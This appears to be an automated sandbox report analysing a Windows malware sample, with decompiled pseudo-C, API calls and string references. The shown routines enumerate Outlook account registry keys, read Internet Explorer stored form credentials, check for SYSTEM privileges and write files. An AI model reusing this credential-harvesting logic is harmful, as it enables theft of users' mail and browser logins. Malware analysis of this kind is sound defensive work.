Part of subcall function 001F4ECD: lstrcatW.KERNEL32(00000000,0023CC6C), ref: 001F4F70
Part of subcall function 001F4ECD: lstrcatW.KERNEL32(00000000,?), ref: 001F4F7E
Part of subcall function 001F4ECD: lstrcatW.KERNEL32(00000000,?), ref: 001F4F8A
Part of subcall function 001F4ECD: RegEnumKeyExW.ADVAPI32(001F549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,001F5384,Identities,00000001), ref: 001F4FC4
Part of subcall function 001F4ECD: RegCloseKey.ADVAPI32(001F549A,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4FD9

Part of subcall function 001F592B: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,00000000,00000000,?), ref: 001F5973
Part of subcall function 001F592B: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F5992
Part of subcall function 001F592B: RegQueryValueExW.KERNEL32(00000100,?,00000000,00000000,00000000,?), ref: 001F59CD
Part of subcall function 001F592B: RegCloseKey.ADVAPI32(00000100), ref: 001F59EE

lstrlenW.KERNEL32(00000000,?,?,?,001F549A), ref: 001F53A8
lstrcpyW.KERNEL32 ref: 001F53C0
lstrcpyW.KERNEL32 ref: 001F53CC

Part of subcall function 001F4E00: lstrlenW.KERNEL32(001F549A,?,?,001F5370,00000001,?,?,?,001F549A), ref: 001F4E4B
Part of subcall function 001F4E00: lstrcpyW.KERNEL32 ref: 001F4E68
Part of subcall function 001F4E00: lstrcatW.KERNEL32(00000000,0023CC6C), ref: 001F4E74
Part of subcall function 001F4E00: lstrcatW.KERNEL32(00000000,?), ref: 001F4E82

Part of subcall function 00205A55: _free.LIBCMT ref: 00205A68

Strings

Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 001F5418
Outlook, xrefs: 001F5389
Identities, xrefs: 001F537A
Software\Microsoft\Internet Account Manager, xrefs: 001F538E
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 001F545E
Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 001F5426
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 001F540A
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 001F5472
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 001F53FF
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 001F5442
\Accounts, xrefs: 001F53C6
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 001F5434
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 001F5450

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts
API String ID: 527226083-2708568971
Opcode ID: 6680e0af140056795263c1539081b7f0425d738b8b9565926d037098f2e364b3
Instruction ID: e4308a3e9b48b390bc049db478057f948c7c24e60c780ba85ecca7ccc014a230
Opcode Fuzzy Hash: 6680e0af140056795263c1539081b7f0425d738b8b9565926d037098f2e364b3
Instruction Fuzzy Hash: 72313EB166020CBFD704E7D4ED87CBF73ACEA25744F600459F20121182EB795F25DA25

Uniqueness

Uniqueness Score: -1.00%

Function 001E032E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 188
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E032E(intOrPtr* __ecx, void* __edx, void* _a4, intOrPtr* _a8, char _a11) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				void* __ebx;
				void* __esi;
				intOrPtr _t49;
				long _t54;
				long _t59;
				void* _t65;
				long _t68;
				int _t77;
				void* _t88;
				intOrPtr* _t89;
				struct _OVERLAPPED* _t90;
				intOrPtr* _t94;
				long _t104;
				intOrPtr* _t112;
				long _t114;
				intOrPtr* _t115;
				void* _t116;

				_t107 = __edx;
				_t115 = __ecx;
				_t112 = _a8;
				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					E001DFC22( *__ecx, __edx);
				}
				_t49 =  *_t115;
				 *(_t115 + 4) =  *(_t115 + 4) | 0xffffffff;
				_t88 = _a4;
				if(_t88 <  *((intOrPtr*)(_t49 + 4))) {
					__eflags =  *((intOrPtr*)(_t49 + 0x10)) - _t88;
					if(__eflags <= 0) {
						L8:
						if(__eflags < 0) {
							E001DF697( *_t115);
							L7:
							__eflags =  *((intOrPtr*)( *_t115 + 0x10)) - _t88;
							goto L8;
						}
						E001DFD36(_t115, _t107, _t88,  &_v568);
						__eflags = _v304 & 0x00000010;
						_t54 =  *_t112;
						if((_v304 & 0x00000010) == 0) {
							_a8 = _t112;
							_t89 = _t112;
							_t94 = _t112;
							__eflags = _t54;
							if(_t54 == 0) {
								L23:
								E00207420( &_v268, _t112);
								__eflags = _t89 - _t112;
								if(_t89 != _t112) {
									_t90 = 0;
									 *((char*)(_t116 + _t89 - _t112 - 0x108)) = 0;
									_t59 = _v268;
									__eflags = _t59 - 0x2f;
									if(_t59 == 0x2f) {
										L30:
										wsprintfA( &_v828, "%s%s",  &_v268, _a8);
										_t113 = _t90;
										L31:
										E001E026B(_t90, _t113,  &_v268); // executed
										_t65 = CreateFileA( &_v828, 0x40000000, _t90, _t90, 2, _v304, _t90); // executed
										_a4 = _t65;
										__eflags = _t65 - 0xffffffff;
										if(_t65 != 0xffffffff) {
											E001DF87B( *_t115,  *((intOrPtr*)(_t115 + 0x138))); // executed
											__eflags =  *(_t115 + 0x13c) - _t90;
											if(__eflags == 0) {
												 *(_t115 + 0x13c) = E00200588(_t115, __eflags, 0x4000);
											}
											while(1) {
												_t110 =  *(_t115 + 0x13c);
												_t68 = E001DF9CC( *_t115,  *(_t115 + 0x13c), 0x4000,  &_a11); // executed
												_t114 = _t68;
												__eflags = _t114 - 0xffffff96;
												if(_t114 == 0xffffff96) {
													break;
												}
												__eflags = _t114;
												if(__eflags < 0) {
													L41:
													_t90 = 0x5000000;
													L45:
													CloseHandle(_a4);
													E001DFC22( *_t115, _t110);
													return _t90;
												}
												if(__eflags <= 0) {
													L39:
													__eflags = _a11;
													if(_a11 != 0) {
														SetFileTime(_a4,  &_v292,  &_v300,  &_v284); // executed
														goto L45;
													}
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													goto L41;
												}
												_t77 = WriteFile(_a4,  *(_t115 + 0x13c), _t114,  &_v8, _t90); // executed
												__eflags = _t77;
												if(_t77 == 0) {
													_t90 = 0x400;
													goto L45;
												}
												goto L39;
											}
											_t90 = 0x1000;
											goto L45;
										}
										return 0x200;
									}
									__eflags = _t59 - 0x5c;
									if(_t59 == 0x5c) {
										goto L30;
									}
									__eflags = _t59;
									if(_t59 == 0) {
										L29:
										_t113 = _t115 + 0x140;
										wsprintfA( &_v828, "%s%s%s", _t115 + 0x140,  &_v268, _a8);
										goto L31;
									}
									__eflags = _v267 - 0x3a;
									if(_v267 == 0x3a) {
										goto L30;
									}
									goto L29;
								}
								_t90 = 0;
								_v268 = 0;
								goto L29;
							} else {
								goto L18;
							}
							do {
								L18:
								__eflags = _t54 - 0x2f;
								if(_t54 == 0x2f) {
									L20:
									_t89 = _t94 + 1;
									goto L21;
								}
								__eflags = _t54 - 0x5c;
								if(_t54 != 0x5c) {
									goto L21;
								}
								goto L20;
								L21:
								_t94 = _t94 + 1;
								_t54 =  *_t94;
								__eflags = _t54;
							} while (_t54 != 0);
							_a8 = _t89;
							goto L23;
						}
						__eflags = _t54 - 0x2f;
						if(_t54 == 0x2f) {
							L15:
							_t104 = 0;
							__eflags = 0;
							L16:
							E001E026B(_t88, _t104, _t112);
							return 0;
						}
						__eflags = _t54 - 0x5c;
						if(_t54 == 0x5c) {
							goto L15;
						}
						__eflags = _t54;
						if(_t54 == 0) {
							L14:
							_t104 = _t115 + 0x140;
							goto L16;
						}
						__eflags =  *((char*)(_t112 + 1)) - 0x3a;
						if( *((char*)(_t112 + 1)) == 0x3a) {
							goto L15;
						}
						goto L14;
					}
					E001DF660(_t49);
					goto L7;
				} else {
					return 0x10000;
				}
			}

0x001e032e
0x001e0339
0x001e033c
0x001e0343
0x001e0347
0x001e0347
0x001e034c
0x001e034e
0x001e0352
0x001e0358
0x001e0364
0x001e0367
0x001e037e
0x001e037e
0x001e0374
0x001e0379
0x001e037b
0x00000000
0x001e037b
0x001e038a
0x001e038f
0x001e0396
0x001e0398
0x001e03c4
0x001e03c7
0x001e03c9
0x001e03cb
0x001e03cd
0x001e03e4
0x001e03ec
0x001e03f3
0x001e03f5
0x001e0403
0x001e0407
0x001e040e
0x001e0414
0x001e0416
0x001e0451
0x001e0467
0x001e0470
0x001e0472
0x001e047a
0x001e0496
0x001e049c
0x001e049f
0x001e04a2
0x001e04b6
0x001e04bb
0x001e04c1
0x001e04ce
0x001e04ce
0x001e04d4
0x001e04d4
0x001e04e5
0x001e04ea
0x001e04ee
0x001e04f1
0x00000000
0x00000000
0x001e04f3
0x001e04f5
0x001e051c
0x001e051c
0x001e054f
0x001e0552
0x001e055a
0x00000000
0x001e055f
0x001e04f7
0x001e0512
0x001e0512
0x001e0516
0x001e0542
0x00000000
0x001e0542
0x001e0518
0x001e051a
0x00000000
0x00000000
0x00000000
0x001e051a
0x001e0508
0x001e050e
0x001e0510
0x001e0523
0x00000000
0x001e0523
0x00000000
0x001e0510
0x001e054a
0x00000000
0x001e054a
0x00000000
0x001e04a4
0x001e0418
0x001e041a
0x00000000
0x00000000
0x001e041c
0x001e041e
0x001e0429
0x001e0433
0x001e0446
0x00000000
0x001e044c
0x001e0420
0x001e0427
0x00000000
0x00000000
0x00000000
0x001e0427
0x001e03f7
0x001e03f9
0x00000000
0x00000000
0x00000000
0x00000000
0x001e03cf
0x001e03cf
0x001e03cf
0x001e03d1
0x001e03d7
0x001e03d7
0x00000000
0x001e03d7
0x001e03d3
0x001e03d5
0x00000000
0x00000000
0x00000000
0x001e03da
0x001e03da
0x001e03db
0x001e03dd
0x001e03dd
0x001e03e1
0x00000000
0x001e03e1
0x001e039a
0x001e039c
0x001e03b4
0x001e03b4
0x001e03b4
0x001e03b6
0x001e03b8
0x00000000
0x001e03bd
0x001e039e
0x001e03a0
0x00000000
0x00000000
0x001e03a2
0x001e03a4
0x001e03ac
0x001e03ac
0x00000000
0x001e03ac
0x001e03a6
0x001e03aa
0x00000000
0x00000000
0x00000000
0x001e03aa
0x001e036b
0x00000000
0x001e035a
0x00000000
0x001e035a

APIs

wsprintfA.USER32 ref: 001E0446
wsprintfA.USER32 ref: 001E0467
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 001E0496
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001E0508
SetFileTime.KERNEL32(?,?,?,?), ref: 001E0542
CloseHandle.KERNEL32(?), ref: 001E0552

Strings

:, xrefs: 001E0420
%s%s%s, xrefs: 001E0440
%s%s, xrefs: 001E0461

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$wsprintf$CloseCreateHandleTimeWrite
String ID: %s%s$%s%s%s$:
API String ID: 1593831391-3034790606
Opcode ID: b4fd84c5a7b34511d911071d36de51c34cde156ef63c5f21930cd8816dde7d74
Instruction ID: 714d55b9bd7f506a1931774a791f04ce6f6043d68d538a3294ef26b0d9c1c3e7
Opcode Fuzzy Hash: b4fd84c5a7b34511d911071d36de51c34cde156ef63c5f21930cd8816dde7d74
Instruction Fuzzy Hash: 8C613730504B88AFCB36DF69D884BEE77A9EF19300F14456AE59A97191D7B09EC2CF10

Uniqueness

Uniqueness Score: -1.00%

Function 001F8DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001F8DFD() {
				long _v8;
				void* _v12;
				signed int _v16;
				void* __edi;
				void* __esi;
				int _t20;
				int _t23;
				void* _t32;
				union _TOKEN_INFORMATION_CLASS _t34;

				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) == 0) {
					L8:
					return 0;
				}
				_t34 = 1;
				_t20 = GetTokenInformation(_v12, 1, 0, _v8,  &_v8); // executed
				if(_t20 != 0 || GetLastError() == 0x7a) {
					_t32 = GlobalAlloc(0x40, _v8);
					_t23 = GetTokenInformation(_v12, _t34, _t32, _v8,  &_v8); // executed
					if(_t23 == 0) {
						goto L8;
					}
					_v16 = _v16 & 0x00000000;
					_push( &_v16);
					_push( *_t32);
					if( *0x22d020() == 0) {
						goto L8;
					}
					if(E002112D0(_t32, _t34, L"S-1-5-18", _v16) != 0) {
						_t34 = 0;
					}
					GlobalFree(_t32);
					return _t34;
				} else {
					goto L8;
				}
			}

0x001f8e03
0x001f8e1e
0x001f8e9c
0x00000000
0x001f8e9c
0x001f8e29
0x001f8e30
0x001f8e38
0x001f8e50
0x001f8e5e
0x001f8e66
0x00000000
0x00000000
0x001f8e68
0x001f8e6f
0x001f8e70
0x001f8e7a
0x00000000
0x00000000
0x001f8e8d
0x001f8e8f
0x001f8e8f
0x001f8e92
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 001F8E0F
OpenProcessToken.ADVAPI32(00000000), ref: 001F8E16
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 001F8E30
GetLastError.KERNEL32 ref: 001F8E3A
GlobalAlloc.KERNEL32(00000040,00000000), ref: 001F8E4A
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 001F8E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 001F8E72
GlobalFree.KERNEL32 ref: 001F8E92

Strings

S-1-5-18, xrefs: 001F8E7F

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
String ID: S-1-5-18
API String ID: 857934279-4289277601
Opcode ID: 76ff91987879d976b264d4cc037d5ce2c8d0641f0be772f66d6c5d5b116442f2
Instruction ID: 2f9db27601d008f71a42155a3e65eb380ab000be483fcba23f5c310e2d838e66
Opcode Fuzzy Hash: 76ff91987879d976b264d4cc037d5ce2c8d0641f0be772f66d6c5d5b116442f2
Instruction Fuzzy Hash: 4E11E935910218BBDB21ABE1EC0DFAF7FB9EB44751F204055E706E1061DB749B16DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001F4ECD, Relevance: 15.1, APIs: 10, Instructions: 102
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E001F4ECD(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				int _v8;
				void* _v12;
				int* _v16;
				intOrPtr _v20;
				short _v4116;
				long _t25;
				int _t30;
				long _t44;
				WCHAR* _t48;
				int _t55;
				WCHAR* _t56;
				int _t58;
				WCHAR* _t59;

				E002010E0(0x1010);
				_t59 = _a4;
				_t55 = 0;
				_v20 = __ecx;
				_t25 = RegOpenKeyExW(0x80000001, _t59, 0, 0x20019,  &_v12); // executed
				if(_t25 == 0) {
					_v16 = 0;
					_v8 = 0x7ff;
					if(RegEnumKeyExW(_v12, 0,  &_v4116,  &_v8, 0, 0, 0, 0) != 0) {
						L12:
						return RegCloseKey(_v12);
					}
					_t48 = _a8;
					do {
						if(_t59 != 0) {
							_t55 = lstrlenW(_t59);
						}
						if(_t48 == 0) {
							_t30 = 0;
						} else {
							_t30 = lstrlenW(_t48);
						}
						_push(4 + (_t30 + _t55 + _v8) * 2);
						_t56 = E00206832();
						lstrcpyW(_t56, _t59);
						lstrcatW(_t56, "\\");
						lstrcatW(_t56,  &_v4116);
						if(_t48 != 0) {
							lstrcatW(_t56, _t48);
						}
						E001F4E00(_v20, _t56);
						E00205A55(_t56);
						_v8 = 0x7ff;
						_t58 =  &(_v16[0]);
						_v16 = _t58;
						_t44 = RegEnumKeyExW(_v12, _t58,  &_v4116,  &_v8, 0, 0, 0, 0);
						_t55 = 0;
					} while (_t44 == 0);
					goto L12;
				}
				return _t25;
			}

0x001f4ed5
0x001f4edb
0x001f4ee8
0x001f4eea
0x001f4ef4
0x001f4efc
0x001f4f09
0x001f4f13
0x001f4f27
0x001f4fd6
0x00000000
0x001f4fd9
0x001f4f2e
0x001f4f31
0x001f4f33
0x001f4f3c
0x001f4f3c
0x001f4f40
0x001f4f4b
0x001f4f42
0x001f4f43
0x001f4f43
0x001f4f59
0x001f4f60
0x001f4f64
0x001f4f70
0x001f4f7e
0x001f4f86
0x001f4f8a
0x001f4f8a
0x001f4f94
0x001f4f9a
0x001f4fad
0x001f4fbb
0x001f4fc1
0x001f4fc4
0x001f4fcc
0x001f4fcd
0x00000000
0x001f4fd5
0x001f4fe2

APIs

RegOpenKeyExW.KERNEL32(80000001,001F549A,00000000,00020019,001F549A,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4EF4
RegEnumKeyExW.ADVAPI32(001F549A,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001F5384,Identities,00000001), ref: 001F4F1F
lstrlenW.KERNEL32(001F549A,00000000,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4F36
lstrlenW.KERNEL32(?,00000000,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4F43
lstrcpyW.KERNEL32 ref: 001F4F64
lstrcatW.KERNEL32(00000000,0023CC6C), ref: 001F4F70
lstrcatW.KERNEL32(00000000,?), ref: 001F4F7E
lstrcatW.KERNEL32(00000000,?), ref: 001F4F8A
RegEnumKeyExW.ADVAPI32(001F549A,?,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,001F5384,Identities,00000001), ref: 001F4FC4
RegCloseKey.ADVAPI32(001F549A,?,?,?,001F5384,Identities,00000001,?,?,?,001F549A), ref: 001F4FD9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
String ID:
API String ID: 3646165539-0
Opcode ID: 5ba41102f12fb9b5c50cf15f8441c81db14051616718fa18870d6dd9f613be82
Instruction ID: 2240a7f7907a37d5d79099050e73404493601eca3c202673c0108f6a8aa69d91
Opcode Fuzzy Hash: 5ba41102f12fb9b5c50cf15f8441c81db14051616718fa18870d6dd9f613be82
Instruction Fuzzy Hash: B0317F71900209BFDB209F95EC8CEBF7BBCEF85740F104069F909E2210DB789A56DA60

Uniqueness

Uniqueness Score: -1.00%

Function 0021984D, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0021984D(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0020B981(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0020B994( *_t137))) = 9;
						L60:
						_t139 = L002067D1();
						goto L61;
					}
					__eflags = _t198 -  *0x24bf98; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x24bd98 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0020B981(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0020B994(__eflags))) = 0x16;
								L002067D1();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0021918E(_t154);
								E00217FE3(0);
								E00217FE3(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E00219DA0(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x24bd98 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x24bd98 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x24bd98 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x24bd98 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x24bd98 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x24bd98 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x24bd98 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0022340B(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0020B95E(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0020B994(__eflags))) = 9;
											 *(E0020B981(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x24bd98 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00219396();
												} else {
													_t170 = E002196BE();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00219567(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x24bd98 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0020B994(__eflags))) = 0xc;
									 *(E0020B981(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
